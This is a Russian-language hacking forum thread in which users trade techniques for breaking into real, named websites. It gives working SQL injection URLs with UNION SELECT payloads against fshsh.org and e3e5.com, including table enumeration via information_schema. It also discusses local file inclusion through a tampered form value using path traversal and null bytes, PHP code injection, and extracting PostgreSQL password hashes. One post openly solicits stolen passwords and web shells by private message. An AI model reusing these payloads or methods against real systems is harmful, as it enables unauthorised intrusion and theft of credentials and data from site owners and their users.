Code: http://www.fshsh.org/lajmi.php?id=-47+union+select+1,2,3,4,5-- но Code: http://www.fshsh.org/lajmi.php?id=-47+union+select+1,version(),3,4,5-- ничего не выводит. unhex(hex(version())) и др. кодирование не помогает.. Как раскрутить ее?
что можно дальше с этим сделать? Но можно воспользоваться аналогом "more that 1 row". http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=(select+1,2)+
2 ПаВлУшКа: А дальше включать мосг, подумав решить, что ЭТА скуля тупая и нам не нужна и найти на этом же сайте другую, ХОРОШУЮ скулю: Code: http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,version() Code: http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,table_name+from+information_schema.tables
Подскажите: Есть форма авторизации там есть <select id="number" name="number"> <OPTION value="aa">1</OPTION> <OPTION value="bb">2</OPTION> <OPTION value="cc">3</OPTION> <OPTION value="dd">4</OPTION> </select> и кнопка отправки, данные форма передаёт файлу login.php после изменения в форме value="aa" например на value="aa2" то после отправки запроса выдаёт ошибку примерно такого содержания Code: Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103 Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103 Подскажите что можно тут выполнить?например чтонибудь связаное с инклудом другого файла p.s извеняйте за обьяснение, как смог(
По идее локальный инклуд, а как реализовать - хз, смотреть надо. Но в личку просьба пароли и прочее не кидать!
Дорогие друзья! Т.к. уважаемый товарищ Pashkela официально отказался от приема важной информации в ЛС, которой вы наверное безудержно хотите поделиться, я вас грандиозно обрадую! Теперь у вас есть неповторимая нигде возможность отправить все пассы\шеллы и т.п. мне в личку! З.Ы по возможности, оформляйте все красиво и удобно, чтобы мне не приходилось искать на всяких сайтах "бесполезные инклуды" С любовью, ваш Iceangel_ . P.S. Дабы сообщение не входило в разряд "флуда", дам пару советов )) 2 Aleksandeer ну а что тебе мешает попробовать инклуднуть что-нибудь? 2 navigat0r наверное это можно хекноть
Как обнулить сессии в бд? То есть чтобы всех юзеров выкинуло в тупую, но надо через БД это все сделать Двиг SMF
а можно ссылку посмотреть? может там можно произвести php-injection по принципу закрыть функцию подключения конфига ");" и вставить свой рнр код...
Вопрос по PostgreSQL иньекцию Вывожу из базы pg_user логины потом пытаюсь вывести пароли а там звездочки! что делать? или звездочки это существенно в PostgreSQL и раскрыть их незя?
Винстул,попугай, а где вы видите форму ввода о.О Там вообщето менюха позволяющая выбрать либо 1 либо 2 либо 3...
yes sir!!! По приказу вышестоящего начальства объясняю: При передачи значения /../../../../lololo в переменную value сценарий попытается включить файл config/../../../../lololo.php. Даже если расширение удастся отбросить нулбайтом или слешами, то в 90% случаев инклуд не пролезет если папки config не существует. Хотя , я где-то читал, что при какой-то конфигурации PHP+Linux может пролезть и при несуществующей папке. В винде будет работать на ура , независимо от наличия папки. Это если чесно совсем не понял. Если можно покажи пример того, что ты хотел сделать и пример кода при котором это может сработать diznt В этой таблице нет паролей, они хранятся в pg_shadow но на её прочтения у тебя 99% не хватит прав